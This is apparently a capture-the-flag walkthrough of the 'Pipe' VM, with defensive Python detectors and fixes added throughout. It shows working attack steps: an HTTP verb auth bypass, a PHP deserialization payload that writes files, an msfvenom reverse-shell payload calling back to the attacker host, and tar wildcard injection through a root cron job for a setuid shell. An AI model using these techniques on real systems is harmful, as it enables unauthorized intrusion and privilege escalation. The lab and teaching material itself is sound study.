Published in: writeup
Tags: /dev/random

/dev/random: Pipe

Pipe was a VM created by Sagi- for ZaCon. It’s quite a short VM, presumably to fit comfortably in a con session, but it’s fun nonetheless!

Scan dem Ports

[email protected]:~# nmap -n -p- -A 192.168.56.102

PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.7p1 Debian 5 (protocol 2.0)
| ssh-hostkey: 
|   1024 16:48:50:89:e7:c9:1f:90:ff:15:d8:3e:ce:ea:53:8f (DSA)
|   2048 ca:f9:85:be:d7:36:47:51:4f:e6:27:84:72:eb:e8:18 (RSA)
|_  256 d8:47:a0:87:84:b2:eb:f5:be:fc:1c:f1:c9:7f:e3:52 (ECDSA)
80/tcp    open  http    Apache httpd
| http-auth: 
| HTTP/1.1 401 Unauthorized
|_  Basic realm=index.php
|_http-methods: No Allow or Public header in OPTIONS response (status code 401)
|_http-server-header: Apache
|_http-title: 401 Unauthorized
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100024  1          33500/udp  status
|_  100024  1          36100/tcp  status
36100/tcp open  status  1 (RPC #100024)

Verb Abuse

Hop on over to the web service, and we’re met by an HTTP Basic authentication prompt.

If we intercept the traffic in Burp Suite, we can see that the page being requested is index.php. After a bit of tampering, I found that the authentication could be bypassed by using an invalid verb.

MEH /index.php HTTP/1.1
Host: 192.168.56.102
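Why an invalid verb gets past Basic auth: in Apache, a `Require valid-user` placed inside a `<Limit GET POST>` block only applies to the listed methods, so any other method, including a made-up one, reaches index.php unauthenticated; the fix is `<LimitExcept GET POST>` or, simpler, dropping the `<Limit>` wrapper so the requirement covers every method. The writeup does not show the VM's httpd configuration, so treating that as the cause here is an assumption. The following Python is an added example, not code from the writeup: a small detector that parses Apache combined-format access log lines (constructed samples, not logs from the VM) and reports requests that used a non-standard method and still got a success response on a path that should have demanded credentials.

```python
import re
from collections import Counter

# Constructed sample lines in Apache "combined" log format; not real logs from the VM.
SAMPLE_LOG = """\
192.168.56.101 - - [02/Oct/2015:21:20:01 +0100] "GET /index.php HTTP/1.1" 401 381 "-" "Mozilla/5.0"
192.168.56.101 - - [02/Oct/2015:21:20:05 +0100] "MEH /index.php HTTP/1.1" 200 1573 "-" "Mozilla/5.0"
192.168.56.101 - - [02/Oct/2015:21:20:09 +0100] "POST /index.php HTTP/1.1" 200 1612 "-" "Mozilla/5.0"
192.168.56.101 - - [02/Oct/2015:21:21:30 +0100] "FOO /index.php HTTP/1.1" 200 1573 "-" "curl/7.38.0"
192.168.56.101 - - [02/Oct/2015:21:21:31 +0100] "OPTIONS /index.php HTTP/1.1" 401 381 "-" "curl/7.38.0"
garbage line that does not parse
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[^ "]+) (?P<path>[^ "]+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Methods a normal client sends; anything else is worth a look.
KNOWN_METHODS = {"GET", "HEAD", "POST", "PUT", "DELETE", "OPTIONS", "TRACE", "CONNECT", "PATCH"}


def parse_line(line):
    """Return a dict for one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def find_verb_abuse(log_text, protected_prefix="/"):
    """Requests with a non-standard method that got a 2xx on a protected path.

    A correctly scoped auth requirement answers every method with 401, so a 2xx
    here means the requirement only covered a subset of methods.
    """
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        if (rec["method"] not in KNOWN_METHODS
                and rec["path"].startswith(protected_prefix)
                and 200 <= rec["status"] < 300):
            hits.append(rec)
    return hits


def methods_per_source(log_text):
    """Histogram of methods per client IP; one host cycling through odd verbs stands out."""
    counts = {}
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        counts.setdefault(rec["ip"], Counter())[rec["method"]] += 1
    return counts


if __name__ == "__main__":
    for hit in find_verb_abuse(SAMPLE_LOG, "/index.php"):
        print(f'{hit["ts"]} {hit["ip"]} {hit["method"]} {hit["path"]} -> {hit["status"]}')
```

Run against a real access log, `find_verb_abuse(open(path).read(), "/index.php")` lists exactly the requests that slipped past the auth wall; a clean configuration produces no hits because every unknown method is answered with 401 (or 405 from the application).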

Next we see a page entitled “The Treachery of Images”. At the bottom of the page is a hyperlink that runs some JavaScript; looking at the source, we see what looks suspiciously like serialized data.

"O:4:\"Info\":4:"

Intercepting the POST request in Burp confirms this:

param=O:4:"Info":4:{s:2:"id";i:1;s:9:"firstname";s:4:"Rene";s:7:"surname";s:8:"Margitte";s:7:"artwork";s:23:"The Treachery of Images";}

Also within the source is the path of the JavaScript serialization code. Navigating to that directory, we find another file.

src="scriptz/php.js"
Index of /scriptz
    log.php.BAK
    php.js

Peeking at log.php.BAK reveals the code for the page - it’s reasonable to assume that this is a backup of index.php.

<?php
class Log
{
    public $filename = '';
    public $data = '';

    public function __construct()
    {
        $this->filename = '';
        $this->data = '';
    }

    public function PrintLog()
    {
        $pre = "[LOG]";
        $now = date('Y-m-d H:i:s');

        $str = '$pre - $now - $this->data';
        eval("\$str = \"$str\";");
        echo $str;
    }

    public function __destruct()
    {
        file_put_contents($this->filename, $this->data, FILE_APPEND);
    }
}
?>
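Before following the writeup into exploitation, the defender's view of this class: unserialize() on untrusted input will instantiate whatever class name the data names, and Log carries two gadgets that fire without any call from the application, a __destruct() that writes attacker-chosen data to an attacker-chosen path and a PrintLog() that eval()s interpolated data. The fixes on the PHP side are to pass an allow-list (`unserialize($param, ['allowed_classes' => ['Info']])`, available since PHP 7) or, better, to exchange plain JSON, and to keep side effects out of __destruct(). The following Python is an added example, not code from the writeup: a parser for PHP's serialize() format that walks a request parameter and reports every class it would instantiate, so a gateway or log-review script can reject anything outside the expected allow-list. The two sample payloads are the benign Info object and the Log object shown later in the writeup.

```python
"""Walk a PHP serialize() string and report which classes unserialize() would instantiate."""


class PhpSerializeError(ValueError):
    """Malformed serialized data (truncated, bad length prefix, unknown type tag)."""


def parse_php_serialized(data):
    """Parse serialize() output into Python values.

    Returns (value, classes) where classes lists every class name seen, in order.
    Objects become dicts with a "__class__" key; nothing is ever instantiated.
    Only the core tags are handled: N b i d s a O. Custom serialization (C:)
    and references (r:/R:) are rejected rather than guessed at.
    """
    pos = 0
    classes = []

    def take_until(ch):
        nonlocal pos
        end = data.find(ch, pos)
        if end < 0:
            raise PhpSerializeError(f"missing {ch!r} after offset {pos}")
        tok = data[pos:end]
        pos = end + 1
        return tok

    def expect(lit):
        nonlocal pos
        if not data.startswith(lit, pos):
            raise PhpSerializeError(f"expected {lit!r} at offset {pos}")
        pos += len(lit)

    def take_len_prefixed(terminator):
        # <len>:"<bytes>" followed by terminator; PHP counts bytes, samples here are ASCII
        nonlocal pos
        length = int(take_until(":"))
        expect('"')
        s = data[pos:pos + length]
        if len(s) != length:
            raise PhpSerializeError("string shorter than its length prefix")
        pos += length
        expect('"' + terminator)
        return s

    def take_pairs(count):
        out = {}
        for _ in range(count):
            key = parse_value()
            out[key] = parse_value()
        expect("}")
        return out

    def parse_value():
        nonlocal pos
        if pos >= len(data):
            raise PhpSerializeError("unexpected end of data")
        tag = data[pos]
        pos += 1
        if tag == "N":
            expect(";")
            return None
        expect(":")
        if tag == "b":
            return take_until(";") == "1"
        if tag == "i":
            return int(take_until(";"))
        if tag == "d":
            return float(take_until(";"))
        if tag == "s":
            return take_len_prefixed(";")
        if tag == "a":
            count = int(take_until(":"))
            expect("{")
            return take_pairs(count)
        if tag == "O":
            cls = take_len_prefixed(":")
            classes.append(cls)
            count = int(take_until(":"))
            expect("{")
            obj = {"__class__": cls}
            obj.update(take_pairs(count))
            return obj
        raise PhpSerializeError(f"unsupported tag {tag!r} at offset {pos - 1}")

    value = parse_value()
    if pos != len(data):
        raise PhpSerializeError(f"trailing data at offset {pos}")
    return value, classes


def check_param(param, allowed_classes=("Info",)):
    """Gatekeeper for the `param` field: returns (accepted, reason)."""
    try:
        _, classes = parse_php_serialized(param)
    except (PhpSerializeError, ValueError) as exc:
        return False, f"malformed serialized data: {exc}"
    rejected = sorted(set(classes) - set(allowed_classes))
    if rejected:
        return False, "disallowed class(es): " + ", ".join(rejected)
    return True, "ok"


# Sample input copied from the writeup: the benign object the page's JavaScript
# posts, and the Log object that reaches __destruct()'s file write.
BENIGN_PARAM = ('O:4:"Info":4:{s:2:"id";i:1;s:9:"firstname";s:4:"Rene";'
                's:7:"surname";s:8:"Margitte";s:7:"artwork";s:23:"The Treachery of Images";}')
LOG_PARAM = ('O:3:"Log":2:{s:8:"filename";s:30:"/var/www/html/scriptz/test.php";'
             's:4:"data";s:19:"<?php phpinfo(); ?>";}')

if __name__ == "__main__":
    for p in (BENIGN_PARAM, LOG_PARAM):
        print(check_param(p))
```

The parser deliberately mirrors the rule a hardened endpoint should apply: the only thing that matters is the set of `O:` class names, so a nested object inside an array is caught just the same, and anything it cannot fully parse is rejected rather than passed through.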

We see that there’s a function that could enable us to write files to the web server - a prime opportunity to write a PHP shell. But first, we’ll try something simple.

<?php

// Minimal copy of the Log class: just the properties serialize() needs and the
// __destruct() that does the file write. Declaring the properties keeps the
// serialized property order explicit and avoids the dynamic-property notice on
// newer PHP versions.
class Log {

  public $filename = '';
  public $data = '';

  public function __construct() {
    $this->filename = '/var/www/html/scriptz/test.php';
    $this->data = '<?php phpinfo(); ?>';
  }

  public function __destruct() {
    file_put_contents($this->filename, $this->data, FILE_APPEND);
  }
}

print serialize(new Log);

?>

We do have permission to write into the webroot /var/www/html as well as scriptz. Since scriptz allows us to list the directory, it makes it easier to know if our write has succeeded.

[email protected]:~# php put-file.php 
O:3:"Log":2:{s:8:"filename";s:30:"/var/www/html/scriptz/test.php";s:4:"data";s:19:"<?php phpinfo(); ?>";}

Now just copy this text as the value for param in the POST request. It’s easiest to do this via the Burp Repeater.

Index of /scriptz
    log.php.BAK
    php.js
    test.php

Go to test.php just to make sure it works…

Excellent - time to upload a shell. I opt for a Staged Meterpreter PHP payload, since it’s small and flexible.

msfvenom -p php/meterpreter/reverse_php LHOST=192.168.56.101 LPORT=4444 -f raw | base64 | tr -d '\n'

$this->filename = '/var/www/html/scriptz/shell.php';
$this->data ='<?php eval(base64_decode(\'Lyo8P3BocC[...snip...]BkaWUoKTs=\')) ?>';

Remember to escape the single quotes inside the PHP string, as above.

msf exploit(handler) > run 

[*] Started reverse handler on 192.168.56.101:4444 
[*] Starting the payload handler...
[*] Sending stage (32461 bytes) to 192.168.56.102
[*] Meterpreter session 1 opened (192.168.56.101:4444 -> 192.168.56.102:48112) at 2015-10-02 21:26:16 +0100

meterpreter > getuid 
Server username: www-data (33)

Rene

After looking around the file system a bit, I spotted some files in rene’s home directory.

meterpreter > ls /home/rene
40777/rwxrwxrwx   4096  dir   2015-10-02 21:27:01 +0100  backup

meterpreter > ls /home/rene/backup
100644/rw-r--r--  98925  fil   2015-10-02 21:25:01 +0100  backup.tar.gz
100644/rw-r--r--  30263  fil   2015-10-02 21:27:01 +0100  sys-10582.BAK
100644/rw-r--r--  17323  fil   2015-10-02 21:27:01 +0100  sys-4811.BAK

After some time, we notice that the sys-* files are created and removed periodically, and that the timestamp on backup.tar.gz changes. This suggests some sort of scheduled job is running, so we go looking for cron jobs.

meterpreter > cat /etc/crontab

* * * * * root /root/create_backup.sh
*/5 * * * * root /usr/bin/compress.sh

meterpreter > ls /usr/bin/compress.sh
100755/rwxr-xr-x  190  fil  2015-07-06 02:12:03 +0100  /usr/bin/compress.sh

meterpreter > cat /usr/bin/compress.sh
#!/bin/sh

rm -f /home/rene/backup/backup.tar.gz
cd /home/rene/backup
tar cfz /home/rene/backup/backup.tar.gz *
chown rene:rene /home/rene/backup/backup.tar.gz
rm -f /home/rene/backup/*.BAK

So /root/create_backup.sh runs every minute, and /usr/bin/compress.sh runs every 5 minutes. The second script is world-readable, so we can inspect it. What we see is the classic tar wildcard injection: the shell expands * into whatever filenames are in the directory, so a file whose name looks like a tar option is parsed as one. The backup directory is world-writable, so we can drop our exploit in easily.
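As an added example, not code from the writeup: a Python audit that checks for the two conditions this privilege escalation needs (a directory that someone other than root can write to, and entries whose names the shell's `*` will hand to tar as options) and builds the argument vector a fixed compress.sh should use instead. The sample directory is constructed in a temporary location and seeded with the two option-like names shown in the writeup.

```python
import os
import stat
import tempfile


def option_like_names(directory):
    """Entries whose names start with '-': after the shell expands '*', tar
    parses these as options (e.g. --checkpoint-action), not as files."""
    return sorted(n for n in os.listdir(directory) if n.startswith("-"))


def writable_by_non_root(path):
    """True if any non-root user can write here: owned by a non-root uid, or
    group/world write bits set."""
    st = os.stat(path)
    return st.st_uid != 0 or bool(st.st_mode & (stat.S_IWGRP | stat.S_IWOTH))


def audit_backup_dir(directory):
    """Findings for a directory that a root cron job archives with 'tar ... *'."""
    findings = []
    if writable_by_non_root(directory):
        findings.append(f"{directory}: writable by a non-root user, so the job's input is attacker-controlled")
    for name in option_like_names(directory):
        findings.append(f"{directory}: entry {name!r} would reach tar as an option via '*'")
    return findings


def safe_tar_argv(directory, archive):
    """Run tar from inside the directory and name '.' explicitly: no shell glob,
    so no entry can be mistaken for an option whatever it is called."""
    return ["tar", "-czf", archive, "-C", directory, "."]


def build_sample_dir():
    """Constructed sample: a world-writable backup directory holding an ordinary
    .BAK file and the two option-like names from the writeup."""
    d = tempfile.mkdtemp(prefix="backup-audit-")
    for name in ("sys-4811.BAK", "--checkpoint=1", "--checkpoint-action=exec=sh shell.sh"):
        with open(os.path.join(d, name), "w"):
            pass
    os.chmod(d, 0o777)
    return d


if __name__ == "__main__":
    sample = build_sample_dir()
    for finding in audit_backup_dir(sample):
        print(finding)
    print("fixed invocation:", " ".join(safe_tar_argv(sample, os.path.join(sample, "backup.tar.gz"))))
```

The script-level fix is to stop letting the shell build tar's argument list: `tar czf /home/rene/backup/backup.tar.gz -C /home/rene/backup .` (or `./*`, whose expansions can never start with a dash). GNU tar notices when the archive lies inside the tree it is reading and skips it. Beyond the script, a root cron job should not consume input from a directory that unprivileged users can write to at all.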

I created a simple script that copies sh to /tmp and sets the setuid bit.

meterpreter > edit shell.sh
cp /bin/sh /tmp/sh
chmod 4777 /tmp/sh
(:wq)

meterpreter > edit "--checkpoint-action=exec=sh shell.sh"
(:wq)
meterpreter > edit "--checkpoint=1"
(:wq)

Sit back, and…

meterpreter > ls /tmp
104777/rwxrwxrwx  125400  fil   2015-10-02 21:30:01 +0100  sh

meterpreter > execute -f /tmp/sh -c -i
whoami
root

Flag

                                                                   .aMMMMMMMMn.  ,aMMMMn.
                                                                 .aMccccccccc*YMMn.    `Mb
                                                                aMccccccccccccccc*Mn    MP
                                                               .AMMMMn.   MM `*YMMY*ccaM*
                                                              dM*  *YMMb  YP        `cMY
                                                              YM.  .dMMP   aMn.     .cMP
                                                               *YMMn.     aMMMMMMMMMMMY'
                                                                .'YMMb.           ccMP
                                                             .dMcccccc*Mc....cMb.cMP'
                                                           .dMMMMb;cccc*Mbcccc,IMMMMMMMn.
                                                          dY*'  '*M;ccccMM..dMMM..MP*cc*Mb
                                                          YM.    ,MbccMMMMMMMMMMMM*cccc;MP
                                                           *Mbn;adMMMMMMMMMMMMMMMIcccc;M*
                                                          dPcccccIMMMMMMMMMMMMMMMMa;c;MP
                                                          Yb;cc;dMMMMMMMMMMMP*'  *YMMP*
                                                           *YMMMPYMMMMMMP*'          curchack
                                                       +####################################+
                                                       |======                            | |
                                                       |======                            | |
                                                       |======                            | |
                                                       |======                            | |
                                                       |======                            | |
                                                       +----------------------------------+-+
                                                        ####################################
                                                             |======                  |
                                                             |======                  |
                                                             |=====                   |
                                                             |====                    |
                                                             |                        |
                                                             +                        +

 .d8888b.                 d8b          d8b               888                                                                    d8b
d88P  Y88b                Y8P          88P               888                                                                    Y8P
888    888                             8P                888
888        .d88b.  .d8888b888   88888b."  .d88b. .d8888b 888888   88888b.  8888b. .d8888b    888  88888888b.  .d88b.    88888b. 88888888b.  .d88b.
888       d8P  Y8bd88P"   888   888 "88b d8P  Y8b88K     888      888 "88b    "88b88K        888  888888 "88bd8P  Y8b   888 "88b888888 "88bd8P  Y8b
888    88888888888888     888   888  888 88888888"Y8888b.888      888  888.d888888"Y8888b.   888  888888  88888888888   888  888888888  88888888888
Y88b  d88PY8b.    Y88b.   888   888  888 Y8b.         X88Y88b.    888 d88P888  888     X88   Y88b 888888  888Y8b.       888 d88P888888 d88PY8b.   d8b
 "Y8888P"  "Y8888  "Y8888P888   888  888  "Y8888  88888P' "Y888   88888P" "Y888888 88888P'    "Y88888888  888 "Y8888    88888P" 88888888P"  "Y8888Y8P
                                                                  888                                                   888        888
                                                                  888                                                   888        888
                                                                  888                                                   888        888
Well Done!
Here's your flag: 0089cd4f9ae79402cdd4e7b8931892b7